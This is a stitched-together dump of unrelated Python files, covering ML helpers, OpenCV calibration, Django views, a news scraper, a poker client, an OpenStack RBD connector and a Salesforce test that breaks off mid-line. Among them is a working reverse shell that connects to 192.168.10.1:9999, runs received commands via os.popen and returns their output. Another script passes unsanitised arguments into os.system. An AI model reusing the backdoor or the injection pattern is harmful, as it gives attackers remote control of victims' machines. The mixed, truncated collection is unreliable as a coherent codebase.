'MACDBBHU':31, 'MACDBBHD':32, 'MACDBBLU':33, 'MACDBBLD':34, 'MACDBBTU':35, 'MACDBBTD':36, 'PRCHU':41, 'PRCHD':42, 'PRCLU':43, 'PRCLD':44, 'PRCSHU':45, 'PRCSHD':46, 'PRCSLU':47, 'PRCSLD':48, 'PRCMHU':49, 'PRCMHD':50, 'PRCMLU':51, 'PRCMLD':52, 'PRCLHU':53, 'PRCLHD':54, 'PRCLLU':55, 'PRCLLD':56, 'SARSU':61, 'SARSD':62, 'SARRU':63, 'SARRD':64, 'RSI20U':71, 'RSI20D':72, 'RSI80U':73, 'RSI80D':74, 'MFI20U':81, 'MFI20D':82, 'MFI80U':83, 'MFI80D':84, 'EOMU':91, 'EOMD':92, 'SC20':101, 'SC20U':102, 'SC20D':103, 'SC80':104, 'SC80D':105, 'SC80U':106, 'LRHD':111, 'LRHU':112, 'LRLD':113, 'LRLU':114, 'GARTD':121, 'GARTU':122 } self.embedding_size = 32 # tbd self.vocab_size = len(self.marketTrendDict.values())
import pandas as pd import numpy as np import string import random import torch def split_data(data): split_data = [] for string in data: split_space = string.split() for i, word in enumerate(split_space): split_data.append(word) return split_data def y_train_make(n): sp = 0 tp = 1 pg = 2 p = 3 np_sp = np.array([sp]) np_tp = np.array([tp]) np_pg = np.array([pg]) np_p = np.array([p]) y = [] for i in range(n): y.append(np_sp) y.append(np_tp) y.append(np_pg) y.append(np_p) return np.array(y) def to_one_hot(label): one_hot = np.zeros((len(label), 4)) one_hot[np.arange(len(label)), label[:, 0]] = 1 return one_hot def src_trg_split(data): src = [] trg = [] for i in range(0, len(data), 2): src.append(data[i]) trg.append(data[i+1]) return np.array(src), np.array(trg) def compute_bleu(self, output, reference): cc = SmoothingFunction() if len(reference) == 3: weights = (0.33,0.33,0.33) else: weights = (0.25,0.25,0.25,0.25) return sentence_bleu([reference], output,weights=weights,smoothing_function=cc.method1) def reparaterization_trick(mean, logv): std = torch.exp(0.5*logv) eps = torch.randn_like(std) return mean + eps * std def Gaussian_score(words): words_list = [] score = 0 yourpath = './train.txt'#should be your directory of train.txt with open(yourpath,'r') as fp: for line in fp: word = line.split(' ') word[3] = word[3].strip('\n') words_list.extend([word]) for t in words: for i in words_list: if t == i: score += 1 return score/len(words)
# -*- coding: utf-8 -*- """ Created on Tue May 14 12:23:47 2019 @author: Felix De Mûelenaere """ ############################################################################## ########################### Generating test images ########################### ##### from MSK gopro videos #### ############################################################################## #Imports import cv2 import sys import numpy as np from time import gmtime, strftime, sleep np.set_printoptions(threshold=np.nan) if(not sys.argv[1]): print("No imagename given, please provide it as the first argument at " + "the CLI!!") sys.exit(); ############################################################################## ##### things to think about ############################################ ############################################################################## ''' 1. Apply pre-processing to get descent test images (see minerva about camera corection and calibration) 2. Use waitKey to obtain 25 FPS, press a certain key to save the test-img ''' ############################################################################## ##### Functions ############################################ ############################################################################## ''' #Python: cv2.undistort(src, cameraMatrix, distCoeffs[, dst[, newCameraMatrix]] The function transforms an image to compensate radial and tangential lens distortion. The function is simply a combination of initUndistortRectifyMap() (with unity R ) and remap() (with bilinear interpolation). ''' ############################################################################## ##### Variables & Functions ############################################ ############################################################################## path_vids = "D:/School/2018-2019/Project CV - Paintings" #MSK_01.mp4 #for camera calibration '''calib_W''' C_W = np.array([[ 5.6729034524746328e+02, 0., 6.3764777940570559e+02], [0., 5.7207768469558505e+02, 3.3299427011674493e+02], [0., 0., 1. ]]) D_W = np.array([ -2.4637408439446815e-01, 7.6662428015464898e-02, -2.7014001885212116e-05, -3.1925229062179259e-04, -1.2400436109816003e-02 ]) '''calib_M''' C_M = np.array([[7.2337882890945207e+02, 0., 6.4226033453805235e+02], [0., 7.2844995950341502e+02, 3.2297129949442024e+02], [0., 0., 1.]]) D_M = np.array([-2.7971075073202351e-01, 1.2737835217024596e-01, 5.5264049900636148e-04, -2.4709811526299534e-04, -3.7787805887358195e-02]) ############################################################################## ##### MAIN ############################################################ ############################################################################## cap = cv2.VideoCapture(path_vids+'/'+sys.argv[1]) count = 0 while(cap.isOpened()): ret, frame = cap.read() # total_frames = cap.get(cv2.CAP_PROP_FRAME_COUNT) if(frame is not None): im = frame.copy() im = cv2.resize(im, (0,0), fx=0.5, fy=0.5)#helft hor en ver if(cap.get(cv2.CAP_PROP_POS_FRAMES)%100==0): print("\n100 frames have passed") C_scale, roi = cv2.getOptimalNewCameraMatrix(C_M, D_M, im.shape[:-1], alpha = 0.5) #calc map mapx, mapy = cv2.initUndistortRectifyMap(C_M, D_M,None, C_scale, im.shape[:-1], m1type = cv2.CV_32FC1) #remap im_rect = cv2.remap(im, mapx, mapy, cv2.INTER_LINEAR) cv2.imwrite('D:/School/2018-2019/Project CV - Paintings/Testimgs/rectified_calibM_v2_s'+str(count)+'.png', im_rect) count += 1 cap.release() cv2.destroyAllWindows()
#!/usr/bin/env python3 # pylint: disable=C0114 import os import sys try: # pylint: disable=W0632 proxy, token, roomName = sys.argv[1:] except ValueError: print('Command arguments: {} <user> <password> <proxy>'.format( os.path.basename(sys.argv[0])) ) sys.exit(1) _COMMAND_ = './ClientServer.py "%(proxy)s" %(token)s r "%(nombre_mapa)s" ' final_command = _COMMAND_ % { 'nombre_mapa': roomName, 'proxy': proxy, 'token': token } os.system(final_command)
#!/usr/bin/python #coding=utf-8 class CookieStoreBase: def getCookie(self, url): raise NotImplementedError def setCookie(self, url, cookie): raise NotImplementedError
import requests url = 'https://mars.se-pro.site' class Blogger: url = 'https://mars.se-pro.site' def __init__(self, full_name): blogger_data = { 'full_name': full_name } response = requests.post(f'{self.url}/bloggers/', data=blogger_data) # print(response.status_code) blogger = response.json() # print('response ', blogger) self.id = blogger['id'] self.full_name = blogger['full_name'] def delete(self, id=None): if id: response = requests.delete(f'{self.url}/bloggers/{id}/') else: response = requests.delete(f'{self.url}/bloggers/{self.id}/') # print(response.status_code) def update(self, full_name): blogger_data = { 'full_name': full_name } response = requests.put(f'{self.url}/bloggers/{self.id}/', data=blogger_data) # print(response.status_code) blogger = response.json() self.id = blogger['id'] self.full_name = blogger['full_name'] # print(blogger) @classmethod def all(cls): response = requests.get(f'{cls.url}/bloggers/') # print(response.status_code) bloggers = response.json() print(bloggers) for blogger in bloggers: print('blogger = ', blogger['full_name']) def __str__(self): return f"Id: {self.id} Name: {self.full_name} " # Blogger.all() eyyub = Blogger('Eyyub Amiraslanov') print(eyyub) eyyub.update('Kenan Semenderli') print(eyyub) # Blogger.all() # eyyub = Blogger('Eyyub Amiraslanov') # print(eyyub) # eyyub.delete(20) # def get_all_bloggers(): # response = requests.get(f'{url}/blogger/') # print(response.status_code) # bloggers = response.json() # for blogger in bloggers: # print('blogger = ', blogger['full_name']) # def create_blogger(full_name): # blogger_data = { # 'full_name': full_name # } # response = requests.post(f'{url}/bloggers/', data=blogger_data) # print(response.status_code) # blogger = response.json() # print(blogger) # def change_blogger(blogger_id, full_name): # blogger_data = { # 'full_name': full_name # } # response = requests.put(f'{url}/bloggers/{blogger_id}/', data=blogger_data) # print(response.status_code) # blogger = response.json() # print(blogger) # def partial_change_blogger(blogger_id, full_name): # blogger_data = { # 'full_name': full_name # } # response = requests.patch(f'{url}/bloggers/{blogger_id}/', data=blogger_data) # print(response.status_code) # blogger = response.json() # print(blogger) # def get_blogger(blogger_id): # response = requests.get(f'{url}/bloggers/{blogger_id}/') # print(response.status_code) # blogger = response.json() # print(blogger) # def delete_blogger(blogger_id): # response = requests.delete(f'{url}/bloggers/{blogger_id}/') # print(response.status_code) # delete_blogger(2) # get_blogger(2)
from django.shortcuts import render from django.http import HttpResponse, HttpResponseRedirect from django.core.urlresolvers import reverse from PIL import Image from aesthetic_computation.models import Post, Category # custom error handlers def handler404(request, *args, **argv): return render(request, 'ac/404.html', {}) def handler500(request, *args, **argv): return render(request, 'ac/500.html', {}) # home page (and category listing page) def home(request, category_name=None): # get posts posts = Post.objects.all() # filter to only posts in a specified category if category_name is not None: try: cat = Category.objects.get(name=category_name) posts = cat.post_set.all() except: # category does not exist, redirect to home return HttpResponseRedirect(reverse('home')) context = {'posts':posts[::-1]} return render(request, 'ac/index.html', context) # single post page def post(request, id): # get post try: post = Post.objects.get(id=id) cats = post.categories.all() except: # post does not exist, redirect to home return HttpResponseRedirect(reverse('home')) # get previous and next posts for arrow links try: prev_post_id = Post.objects.get(id=int(id)-1).id except: prev_post_id = None try: next_post_id = Post.objects.get(id=int(id)+1).id except: next_post_id = None # check if image is sufficiently large that we can allow a big view wide_entry = '' try: with Image.open(post.image_large) as img: width, height = img.size if width >= 1400: wide_entry = ' wide-entry' if width >= 1700: wide_entry += ' wide-entry-xl' if width >= 2300: wide_entry += ' wide-entry-xxl' except: pass # render context = {'post':post, 'cats':cats, 'wide_entry':wide_entry, 'width':width, 'prev_post_id':prev_post_id, 'next_post_id':next_post_id} return render(request, 'ac/post.html', context) # arxiv functionality def arxiv(request, date=None): from .settings import MEDIA_ROOT, MEDIA_URL import os import glob baseurl = MEDIA_URL.replace("projects/","arxiv/") # get list of directories (daily image scrape) dirs = glob.glob(MEDIA_ROOT + "../arxiv/*") dirs.sort(key = os.path.getmtime) dirs = [dir.rsplit("/")[-1] for dir in dirs] # get list of directories (ITA gallery) dirs2 = glob.glob(MEDIA_ROOT + "../arxivpubs/*") dirs2.sort(key = os.path.getmtime) dirs2 = [dir.rsplit("/")[-1] for dir in dirs2 if '.txt' not in dir] # if a date specified, get list of all filenames too images = [] if date is not None and date in dirs + dirs2: images = glob.glob(MEDIA_ROOT + "../arxiv/%s/*" % date) if len(images) == 0: # hack to detect arxivpubs/ request images = glob.glob(MEDIA_ROOT + "../arxivpubs/%s/*" % date) baseurl = MEDIA_URL.replace("projects/","arxivpubs/") images = [image.rsplit("/")[-1] for image in images] images.sort() # list of (image filename, arxiv ID) tuples images = [[image,image.split("_")[0]] for image in images] context = {'dirs':dirs, 'date':date, 'images':images, 'baseurl':baseurl, # daily image scrape 'dirs2':dirs2} # ITA gallery return render(request, 'ac/arxiv.html', context) # aas job map def aasjobmap(request): context = {} return render(request, 'ac/aasjobmap.html', context)
from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, \ Text, insert, select, func from sqlalchemy.exc import SQLAlchemyError from datetime import datetime from itertools import chain from multiprocessing import Pool import logging import parsers import config metadata = MetaData() engine = create_engine(config.db_connection_string) db_news = engine.connect() logging.basicConfig(filename=config.filename_log, level=logging.INFO) sources = Table('sources', metadata, Column('id', Integer(), primary_key=True), Column('name', String(100), nullable=False), Column('url', String(100), unique=True), Column('logo', Text, nullable=False) ) source_urls = Table('source_urls', metadata, Column('id', Integer(), primary_key=True), Column('source_id', Integer(), ForeignKey('sources.id')), Column('url', Text, nullable=False) ) news = Table('news', metadata, Column('id', Integer(), primary_key=True), Column('source_id', Integer(), ForeignKey('sources.id')), Column('title', Text, nullable=False), Column('description', Text, nullable=False), Column('datetime', DateTime(), nullable=False), Column('link', String(768), unique=True), Column('media', Text), Column('tags', Text, nullable=False) ) # Compare the list of resources in the database (tables "sources" and "source_urls") and in the parser module # (parsers.py). Add new resources to the database. def check_resource_list(): list_url_sources = [i[0] for i in db_news.execute(select([sources.c.url])).fetchall()] for resource in parsers.list_sources: try: if resource['url'] not in list_url_sources: db_news.execute(insert(sources), name=resource['name'], url=resource['url'], logo=resource['logo']) for link in resource['links_of_parse']: db_news.execute(insert(source_urls), source_id=get_source_id(resource['url']), url=link) except SQLAlchemyError: logging.exception(f'Error adding source to database: {resource}') # Getting id from table "sources" by url value def get_source_id(url): try: sel = select([sources]).where(sources.c.url == url) source_id = db_news.execute(sel).scalar() return source_id except SQLAlchemyError: logging.exception(f'Error getting the source ID. Link: {url}') # Loading a list of fresh news from a source def download_news(data_source): result = [] func_parser = data_source['func_parser'] func_checking_news = data_source['func_checking'] urls_source = data_source['links_of_parse'] list_news = func_parser(*urls_source) if source_id := get_source_id(data_source['url']): list_fresh_news = [] for news_ in list_news: if is_fresh_news(news_) and news_['link'] not in list_fresh_news: list_fresh_news.append(news_['link']) news_['source_id'] = source_id result.append(func_checking_news(news_)) return result # Checking the presence of this news in the database def is_fresh_news(this_news): try: sel = select([news.c.link]).where(news.c.link == this_news['link']) result = db_news.execute(sel).scalar() return not result except SQLAlchemyError: logging.exception(f'Error checking the presence of this news in the database: {this_news["link"]}') return False def add_news_to_database(n_list): for news_ in n_list: try: db_news.execute(insert(news), news_) except SQLAlchemyError: logging.exception(f'Error adding news to database: {news_}') def get_count_news(): sel = select([func.count()]).select_from(news) result = db_news.execute(sel).scalar() return result if __name__ == "__main__": metadata.create_all(engine) logging.info(f' Time: {datetime.now()}. Start loading news.') check_resource_list() count_news = get_count_news() pool = Pool(processes=8) news_list = pool.map(download_news, parsers.list_sources) news_list = list(chain(*news_list)) news_list.sort(key=lambda x: x['datetime']) add_news_to_database(news_list) logging.info(f' Time: {datetime.now()}. Stop loading news. Added news to DB: {get_count_news() - count_news}')
class Greeter: def __init__(self): pass def speak(self, name): print("Hello", name)
from Dishes import * class Plate(Dishes): def __init__(self, dishesType, material, diameter, dishName): self.dishesType = dishesType self.material = material self.diameter = diameter self.dishName = dishName
from enemyshooter import EnemyShooter from enemybullet import EnemyBullet class ShooterFleet(): def __init__(self, row_count, column_count, initial_speed, enemy_img, starting_xcor, starting_ycor): self.direction = 0.5 self.speed = initial_speed self.ships = self.get_initial_ships(row_count, column_count, enemy_img, starting_xcor, starting_ycor) self.enemybullets_fired = [] self.width = enemy_img.get_width() self.height = enemy_img.get_height() def get_initial_ships(self, row_count, column_count, enemy_img, starting_xcor, starting_ycor): initial_ships = [] for row in range(1): for col in range(1): current_xcor = starting_xcor + col * enemy_img.get_width() current_ycor = starting_ycor + row * enemy_img.get_height() initial_ships.append(EnemyShooter(enemy_img, current_xcor, current_ycor)) self.xcor = current_xcor self.ycor = current_ycor return initial_ships return self.xcor return self.ycor def enemyshoot(self, enemybullet_image): new_enemybullet = EnemyBullet(enemybullet_image, self.xcor + self.width / 2 - enemybullet_image.get_width() / 2, self.ycor) self.enemybullets_fired.append(new_enemybullet) def change_direction(self): self.direction *= -1 def move_over(self): for ship in self.ships: ship.move_over(self.direction * self.speed) def handle_wall_collision_for_enemybullets(self, bottom_wall): for bullet in self.enemybullets_fired: if enemybullet.has_collided_with_bottom_wall(bottom_wall): enemybullet.is_alive = False self.remove_dead_enemybullets() def remove_dead_enemybullets(self): for i in range(len(self.enemybullets_fired) -1, -1, -1): if self.enemybullets_fired[i].is_alive == False: self.enemybullets_fired.pop(i) def move_all_enemybullets(self): for enemybullet in self.enemybullets_fired: enemybullet.move() def show_all_enemybullets(self, game_display): for enemybullet in self.enemybullets_fired: enemybullet.show(game_display) def show(self, game_display): for ship in self.ships: ship.show(game_display) def handle_wall_collision(self, left_wall, right_wall): for ship in self.ships: if ship.has_collided_with_left_wall(left_wall) or ship.has_collided_with_right_wall(right_wall): self.move_down() self.change_direction() break def change_direction(self): self.direction *= -1 def move_over(self): for ship in self.ships: ship.move_over(self.direction * self.speed) def remove_dead_ships(self): for i in range(len(self.ships) -1, -1, -1): if self.ships[i].is_alive == False: self.ships.pop(i)
import sys import zmq import json import uuid class Server: def __init__(self, usr): self.usr = usr self.table = '' ### ZMQ Initialization ### ctx = zmq.Context() self.pubsrv = ctx.socket(zmq.SUB) self.pubsrv.connect('tcp://127.0.0.1:5556') self.pubsrv.setsockopt_string(zmq.SUBSCRIBE, '') self.srv = ctx.socket(zmq.REQ) self.srv.connect("tcp://127.0.0.1:5555") def list_table(self): self.srv.send_string("LIST") return self.srv.recv_string() def create_table(self, name): self.srv.send_string("TABLE %s"%(name)) return self.srv.recv_string() def join_table(self, name): self.srv.send_string("JOIN %s %s"%(self.usr, name)) return self.srv.recv_string() def get_hand(self): self.srv.send_string("GETHAND %s"%(self.usr)) return self.srv.recv_string() def get_turn(self): self.srv.send_string("GETTURN %s"%(self.table)) return self.srv.recv_string() def resubscribe(self, table): self.pubsrv.setsockopt_string(zmq.UNSUBSCRIBE, '') self.pubsrv.setsockopt_string(zmq.SUBSCRIBE, table) def hunt_table(self): while not self.table: msg = self.list_table() if msg.startswith('ERROR'): msg = '[]' tables = json.loads(msg) while tables: tmp = tables.pop() self.resubscribe(tmp) msg = self.join_table(tmp) if not msg.startswith('ERROR'): self.table = tmp return True msg = self.create_table(str(uuid.uuid4())) if msg.startswith('ERROR'): self.resubscribe('') return False def poll_sub(self, handler): while(self.pubsrv.poll(1)): _, _, data = (self.pubsrv.recv_string()).partition(' ') handler(data) class Game: """ Keeps track of game information """ def __init__(self, server): self.money = 0 self.hand = [] self.players = [] self.round = 0 self.turn = 0 self.table = [] self.blind = 0 self.is_over = False self.handlers = {k[len('H_'):]:v for k, v in Game.__dict__.items() if k.startswith('H_')} self.server = server def handle_msg(self, content): """ Invokes the handler for the message received """ print("Handling ", content) content = content.split(' ') cmd = self.handlers.get(content[0], lambda *args: print("Invalid message")) cmd(self, *content[1:]) def H_START(self, start_money, blind_val, *players): """ Handles the start of a new game """ self.money = int(start_money) self.blind = int(blind_val) self.players = list(players) def H_STARTHAND(self, start_player): """ Handles the start of a new hand """ self.turn = self.players.index(start_player) self.hand = json.loads(self.server.get_hand()) def H_BLIND(self, player, value): """ Handles the blind bets """ if player == self.server.usr: self.money -= int(value) def H_TURN(self, player, *actions): """ Handles the Turn information """ if player == self.server.usr: pass #TODO Take some action def H_GAMEOVER(self): """ Handles the end of the game """ self.is_over = True if __name__ == "__main__": usr = '' if len(sys.argv) > 1: usr = sys.argv[1] srv = Server(usr) srv.hunt_table() game = Game(srv) while not game.is_over: srv.poll_sub(game.handle_msg)
import pickle import tensorflow as tf from sklearn.model_selection import train_test_split # from sklearn.cross_validation import train_test_split from alexnet import AlexNet import numpy as np from sklearn.utils import shuffle import time # TODO: Load traffic signs data. with open("train.p", mode='rb') as f: train = pickle.load(f) # TODO: Split data into training and validation sets. features = train['features'] labels = train['labels'] X_train, X_val, y_train, y_val = train_test_split(features, labels, test_size = 0.33, random_state = 2016) graph = tf.Graph() with graph.as_default(): # TODO: Define placeholders and resize operation. x = tf.placeholder(tf.float32, (None, 32, 32, 3)) y = tf.placeholder(tf.int32, None) resized = tf.image.resize_images(x, [227,227]) # TODO: pass placeholder as first argument to `AlexNet`. # By keeping `feature_extract` set to `True` # we indicate to NOT keep the 1000 class final layer # originally used to train on ImageNet. fc7 = AlexNet(resized, feature_extract=True) # NOTE: `tf.stop_gradient` prevents the gradient from flowing backwards # past this point, keeping the weights before and up to `fc7` frozen. # This also makes training faster, less work to do! fc7 = tf.stop_gradient(fc7) # TODO: Add the final layer for traffic sign classification. nb_classes = 43 shape = (fc7.get_shape().as_list()[-1], nb_classes) w_tz = tf.Variable(tf.truncated_normal(shape=shape, stddev=tf.sqrt(2.0/shape[0]))) b_tz = tf.zeros(shape[1]) logits = tf.nn.xw_plus_b(fc7, w_tz, b_tz) # TODO: Define loss, training, accuracy operations. # HINT: Look back at your traffic signs project solution, you may # be able to reuse some the code. loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits, y)) optimizer = tf.train.AdamOptimizer().minimize(loss) train_prediction = tf.nn.softmax(logits) # TODO: Train and evaluate the feature extraction model. acc_val = [] loss_val = [] with tf.Session(graph=graph) as sess: init = tf.global_variables_initializer() sess.run(init) nb_epochs = 1 batch_size = 32 def accuracy(pred, labels): return (np.sum(np.equal(np.argmax(pred, 1),labels)))/pred.shape[0] for epoch in range(nb_epochs): t0 = time.time() total_batch = np.int(X_train.shape[0]/batch_size) X_train, y_train = shuffle(X_train, y_train) for i in range(total_batch): offset = i * batch_size batch_x = X_train[offset:(offset+batch_size), ]/255.0 batch_y = y_train[offset:(offset+batch_size)] sess.run([optimizer, train_prediction], feed_dict={x: batch_x, y: batch_y}) for k in range(0, X_val.shape[0], 57): l, p = sess.run([loss, train_prediction], feed_dict={x: X_val[k:(k+57), ], y: y_val[k:(k+57)]}) acc_val.append(accuracy(p, y_val[k:(k+57)])) loss_val.append(l) print("Epoch {}: ".format(epoch)) print("Time spend: {}".format(time.time()-t0)) print("Validation Loss: {}".format(np.mean(loss_val))) print("Validation Accuracy: {:.3%}".format(np.mean(acc_val))) """ (As a point of reference one epoch over the training set takes roughly 53-55 seconds with a GTX 970.) Epoch 0: Time spend: 932.5579879283905 Validation Loss: 16.838653564453125 Validation Accuracy: 21.470% """
def main(): import matplotlib.pyplot as plt import numpy as np with open('avg1.list') as avg1_list: avg1 = avg1_list.read() avg1 = avg1.split() avg1 = [float(item) for item in avg1] seconds = np.arange(5, avg1.__len__() * 10 + 5, 10) fig, ax = plt.subplots() plt.plot(seconds, avg1) ax.set_xlabel('время от начала дня (сек)') ax.set_ylabel('Load Average 1') plt.show() with open('ram.list') as ram_list: ram = ram_list.read() ram = ram.split() ram = [float(item) for item in ram] seconds = np.arange(5, ram.__len__() * 10 + 5, 10) fig, ax = plt.subplots() plt.plot(seconds, ram) ax.set_xlabel('время от начала дня (сек)') ax.set_ylabel('free RAM') plt.show() if __name__ == "__main__": main()
# Copyright (c) 2018, Red Hat, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """Helper code to attach/detach out of OpenStack OS-Brick is meant to be used within OpenStack, which means that there are some issues when using it on non OpenStack systems. Here we take care of: - Making sure we can work without privsep and using sudo directly - Replacing an unlink privsep method that would run python code privileged - Local attachment of RBD volumes using librados Some of these changes may be later moved to OS-Brick. For now we just copied it from the nos-brick repository. """ import errno import functools import os from os_brick import exception from os_brick.initiator import connector from os_brick.initiator import connectors from os_brick.privileged import rootwrap from oslo_concurrency import processutils as putils from oslo_privsep import priv_context from oslo_utils import fileutils from oslo_utils import strutils import six class RBDConnector(connectors.rbd.RBDConnector): """"Connector class to attach/detach RBD volumes locally. OS-Brick's implementation covers only 2 cases: - Local attachment on controller node. - Returning a file object on non controller nodes. We need a third one, local attachment on non controller node. """ def connect_volume(self, connection_properties): # NOTE(e0ne): sanity check if ceph-common is installed. self._setup_rbd_class() # Extract connection parameters and generate config file try: user = connection_properties['auth_username'] pool, volume = connection_properties['name'].split('/') cluster_name = connection_properties.get('cluster_name') monitor_ips = connection_properties.get('hosts') monitor_ports = connection_properties.get('ports') keyring = connection_properties.get('keyring') except IndexError: msg = 'Malformed connection properties' raise exception.BrickException(msg) conf = self._create_ceph_conf(monitor_ips, monitor_ports, str(cluster_name), user, keyring) link_name = self.get_rbd_device_name(pool, volume) real_path = os.path.realpath(link_name) try: # Map RBD volume if it's not already mapped if not os.path.islink(link_name) or not os.path.exists(real_path): cmd = ['rbd', 'map', volume, '--pool', pool, '--conf', conf] cmd += self._get_rbd_args(connection_properties) stdout, stderr = self._execute(*cmd, root_helper=self._root_helper, run_as_root=True) real_path = stdout.strip() # The host may not have RBD installed, and therefore won't # create the symlinks, ensure they exist if self.containerized: self._ensure_link(real_path, link_name) except Exception: fileutils.delete_if_exists(conf) raise return {'path': real_path, 'conf': conf, 'type': 'block'} def _ensure_link(self, source, link_name): self._ensure_dir(os.path.dirname(link_name)) if self.im_root: try: os.symlink(source, link_name) except OSError as exc: if exc.errno != errno.EEXIST: raise # If we have a leftover link, clean it up if source != os.path.realpath(link_name): os.remove(link_name) os.symlink(source, link_name) else: self._execute('ln', '-s', '-f', source, link_name, run_as_root=True) def check_valid_device(self, path, run_as_root=True): """Verify an existing RBD handle is connected and valid.""" if self.im_root: try: with open(path, 'r') as f: f.read(4096) except Exception: return False return True try: self._execute('dd', 'if=' + path, 'of=/dev/null', 'bs=4096', 'count=1', root_helper=self._root_helper, run_as_root=True) except putils.ProcessExecutionError: return False return True def disconnect_volume(self, connection_properties, device_info, force=False, ignore_errors=False): self._setup_rbd_class() pool, volume = connection_properties['name'].split('/') conf_file = device_info['conf'] link_name = self.get_rbd_device_name(pool, volume) real_dev_path = os.path.realpath(link_name) if os.path.exists(real_dev_path): cmd = ['rbd', 'unmap', real_dev_path, '--conf', conf_file] cmd += self._get_rbd_args(connection_properties) self._execute(*cmd, root_helper=self._root_helper, run_as_root=True) if self.containerized: unlink_root(link_name) fileutils.delete_if_exists(conf_file) def _ensure_dir(self, path): if self.im_root: try: os.makedirs(path, 0o755) except OSError as exc: if exc.errno != errno.EEXIST: raise else: self._execute('mkdir', '-p', '-m0755', path, run_as_root=True) def _setup_class(self): try: self._execute('which', 'rbd') except putils.ProcessExecutionError: msg = 'ceph-common package not installed' raise exception.BrickException(msg) RBDConnector.im_root = os.getuid() == 0 # Check if we are running containerized RBDConnector.containerized = os.stat('/proc').st_dev > 4 # Don't check again to speed things on following connections RBDConnector._setup_rbd_class = lambda *args: None _setup_rbd_class = _setup_class ROOT_HELPER = 'sudo' def unlink_root(*links, **kwargs): no_errors = kwargs.get('no_errors', False) raise_at_end = kwargs.get('raise_at_end', False) exc = exception.ExceptionChainer() catch_exception = no_errors or raise_at_end error_msg = 'Some unlinks failed for %s' if os.getuid() == 0: for link in links: with exc.context(catch_exception, error_msg, links): os.unlink(link) else: with exc.context(catch_exception, error_msg, links): putils.execute('rm', *links, run_as_root=True, root_helper=ROOT_HELPER) if not no_errors and raise_at_end and exc: raise exc def _execute(*cmd, **kwargs): try: return rootwrap.custom_execute(*cmd, **kwargs) except OSError as e: sanitized_cmd = strutils.mask_password(' '.join(cmd)) raise putils.ProcessExecutionError( cmd=sanitized_cmd, description=six.text_type(e)) def init(root_helper='sudo'): global ROOT_HELPER ROOT_HELPER = root_helper priv_context.init(root_helper=[root_helper]) existing_bgcp = connector.get_connector_properties existing_bcp = connector.InitiatorConnector.factory def my_bgcp(*args, **kwargs): if len(args): args = list(args) args[0] = ROOT_HELPER else: kwargs['root_helper'] = ROOT_HELPER kwargs['execute'] = _execute return existing_bgcp(*args, **kwargs) def my_bgc(protocol, *args, **kwargs): if len(args): # args is a tuple and we cannot do assignments args = list(args) args[0] = ROOT_HELPER else: kwargs['root_helper'] = ROOT_HELPER kwargs['execute'] = _execute # OS-Brick's implementation for RBD is not good enough for us if protocol == 'rbd': factory = RBDConnector else: factory = functools.partial(existing_bcp, protocol) return factory(*args, **kwargs) connector.get_connector_properties = my_bgcp connector.InitiatorConnector.factory = staticmethod(my_bgc) if hasattr(rootwrap, 'unlink_root'): rootwrap.unlink_root = unlink_root
import socket import sys import os host = '192.168.10.1' port = 9999 ADDR = (host, port) def create(): global session session = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def connect(): try: session.connect(ADDR) print("[+]Connection is build up") except: print("[-]Can not connect to host") def listen(): while True: command = session.recv(1024) final = command.decode() try: turn = os.popen(final).read() session.send(turn.encode()) except: session.send(("[-]Command has not been done!").encode()) def main(): create() connect() listen() main()
#TO RUN: joey2 project_operation_tests.py import sys import os import unittest import shutil sys.path.append('../') import lib.config as config import lib.mm_util as util import test_helper as helper from lib.mm_connection import MavensMatePluginConnection from lib.mm_client import MavensMateClient class TestProjectOperations(unittest.TestCase): RunInitialDelete = True # FYI: overriding this constructor is apparently not recommended, so we should find a better way to init test data def __init__(self, *args, **kwargs): super(TestProjectOperations, self).__init__(*args, **kwargs) self.project_name = 'MavensMateUnitTestProject' self.username = 'mm@force.com' self.password = 'force' self.org_type = 'developer' def setUp(self): config.connection = MavensMatePluginConnection(client='Sublime Text') if os.path.exists(config.connection.workspace+"/MavensMateUnitTestProject"): shutil.rmtree(config.connection.workspace+"/MavensMateUnitTestProject") temp_client = MavensMateClient(credentials={"username":self.username, "password":self.password}) if self.RunInitialDelete: helper.delete_metadata( temp_client, { 'ApexClass' : ['apex_class_from_unit_test_123'], 'ApexTrigger' : ['apex_trigger_from_unit_test_123'], 'ApexPage' : ['apex_page_from_unit_test_123'], 'ApexComponent' : ['apex_component_from_unit_test_123'] } ) self.__class__.RunInitialDelete = False def test_index_project(self): config.connection.new_project def test_clean_project(self): config.connection.new_project(params={ "project_name" : self.project_name, "username" : self.username, "password" : self.password, "org_type" : self.org_type, "package" : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml },action='new') config.connection.project.clean() self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject")) self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/config")) self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src")) self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/classes")) self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/components")) self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/objects")) self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/pages")) self.assertTrue(os.path.isfile(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/package.xml")) def test_create_new_apex_class(self): config.connection.new_project(params={ "project_name" : self.project_name, "username" : self.username, "password" : self.password, "org_type" : self.org_type, "package" : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml },action='new') deploy_result = config.connection.project.new_metadata( api_name = 'apex_class_from_unit_test_123', apex_class_type = 'default', metadata_type = 'ApexClass' ) print deploy_result self.assertTrue(deploy_result.success == True) helper.delete_metadata(config.connection.project.sfdc_client, {'ApexClass':['apex_class_from_unit_test_123']}) def test_compile_project(self): config.connection.new_project(params={ "project_name" : self.project_name, "username" : self.username, "password" : self.password, "org_type" : self.org_type, "package" : 